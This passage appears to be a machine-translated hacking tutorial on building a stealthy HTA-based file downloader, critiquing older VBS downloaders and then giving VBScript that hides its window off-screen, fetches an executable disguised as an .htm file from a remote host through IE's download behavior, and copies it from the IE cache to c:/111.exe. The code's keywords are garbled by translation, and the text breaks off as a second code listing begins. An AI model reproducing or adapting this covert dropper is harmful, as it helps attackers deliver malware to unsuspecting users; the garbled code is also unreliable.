1. ก่อนอื่นพูดคุยเกี่ยวกับการดาวน์โหลด VBS ที่ค่อนข้างแปลกใหม่ในบล็อกนี้ หนึ่งถูกสร้างขึ้นโดยใช้ส่วนประกอบ cdo.message และอีกส่วนหนึ่งทำโดยใช้ microsoft.xmldom ดู http://www.jb51.net/article/15506.htm หนึ่งในสองตัวดาวน์โหลดนี้มีปัญหาในการใช้และจำเป็นต้องแปลง EXE ล่วงหน้า ประการที่สอง cscript.exe จะเข้าถึงเครือข่ายในระหว่างการใช้งานซึ่งไม่ได้ซ่อนไว้เกินไป ประการที่สองคือบางเครื่องไม่มีส่วนประกอบสองอย่างนี้และใช้ AdoDB.stream ดังนั้นจึงมีข้อเสียบางอย่าง
2. มาพูดถึงผู้ดาวน์โหลด Lake2 http://blog.csdn.net/lake2/archive/2007/05/08/1600580.aspx ตัวดาวน์โหลดนี้ค่อนข้างดี แต่มีปัญหา หนึ่งคือถ้าเบราว์เซอร์อื่นเช่น 360 ติดตั้งหน้าต่าง IE จะเปิดขึ้นและตำแหน่งแคช IE ที่อ่านจากรีจิสทรีอาจไม่ถูกต้อง
3. แล้วเราจะอัปเดตข้อบกพร่องเหล่านี้ได้อย่างไร? ยังมีวิธี เราใช้ HTA เพื่อเขียนสิ่งนี้ซึ่งค่อนข้างหายาก HH.EXE โดยทั่วไปจะถูกปล่อยออกมาเมื่อเข้าถึงเครือข่าย ควรแก้ไขปัญหาได้กี่ครั้งโดยการเขียนตัวดาวน์โหลดนี้:
(1). ทำให้ HTA ล่องหน --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(2). ทำให้พารามิเตอร์บรรทัดคำสั่ง HTA รับ ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(3). อย่าเรียกส่วนประกอบทั้งหมดที่กล่าวถึงในรายการแรกและสองด้านบน ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(4) ที่ตั้งชั่วคราวของ. ie cache ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
(5) เราไม่เรียกองค์ประกอบใด ๆ ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4. รหัส (เขียนพารามิเตอร์โดยตรงใน HTA)
รหัสมีดังนี้:
<ภาษาสคริปต์ = VBS>
window.moveto 4000,4000
window.resizeto 0,0 'ทำให้ HTA มองไม่เห็น
ตั้งค่า objshell = createObject ("wscript.shell") 'hta สามารถเรียก wscript.shell ได้โดยตรง แต่ไม่สามารถโทรหา wscript.criteObject ("wscript.shell")
downpath = objshell.expandenvironmentstrings ("%userprofile%") & "/การตั้งค่าท้องถิ่น" รับเส้นทางดาวน์โหลดตามตัวแปรสภาพแวดล้อม
ตั้งค่า xml = document.createElement ("XML") 'พฤติกรรมเริ่มต้นของการสร้างองค์ประกอบ XML CALL IE
xml.addbehavior ("#เริ่มต้น#ดาวน์โหลด")
xml.async = 0
xml.load ("http://192.168.0.10/xx.htm") 'โปรดเปลี่ยนชื่อของ exe เป็นพื้นที่ หากคุณอัปโหลดด้วยซอฟต์แวร์ FTP อาจไม่ทำงาน มันจะดีกว่าที่จะใส่มัน
showallfile (downpath)
การเดินทางและการค้นหา Sub Showallfile (เส้นทาง) ใช้รหัสของ Lake2 โดยตรง
findFileName = "xx [1] .htm" 'นี่คือสิ่งที่คุณต้องเปลี่ยน ถ้าด้านบนคือ xx.htm นี่คือ xx [1] .htm
ตั้งค่า fso = createObject ("Scripting.filesystemObject")
ตั้งค่า f = fso.getFolder (เส้นทาง)
ตั้งค่า fc = f.subfolders
สำหรับ F1 แต่ละตัวใน FC
ถ้า fso.fileexists (path & "/" & f1.name & "/" & findfilename) แล้ว
FSO.CopyFile Path & "/" & f1.name & "/" & findfilename, "c: /111.exe" 'บันทึกเป็น c: /111.exe และสามารถเปลี่ยนแปลงได้ตามต้องการ
'document.write "[+] ดาวน์โหลดความสำเร็จ!"
สิ้นสุดถ้า
showallfile path & "/" & f1.name
ต่อไป
ตั้งค่า fso = ไม่มีอะไร
สิ้นสุดย่อย
window.close
</script>
การใช้งานคือ: ใส่ exe เหมือน xx.exe บนพื้นที่จากนั้นดับเบิลคลิกที่ HTA นี้
5. รหัสอื่น (พารามิเตอร์บรรทัดคำสั่งผ่าน)
โดยส่วนตัวแล้วฉันคิดว่ารหัสในส่วนที่สี่ดีกว่าเพียงแค่แก้ไขและใช้งาน หากมีการเรียกพารามิเตอร์บรรทัดคำสั่งฉันพบว่าหน้าต่าง HTA จะยังคงปรากฏขึ้นและมันจะปิดหลังจากดาวน์โหลดเท่านั้นดังนั้นนี่จึงไม่ดีมาก รหัส: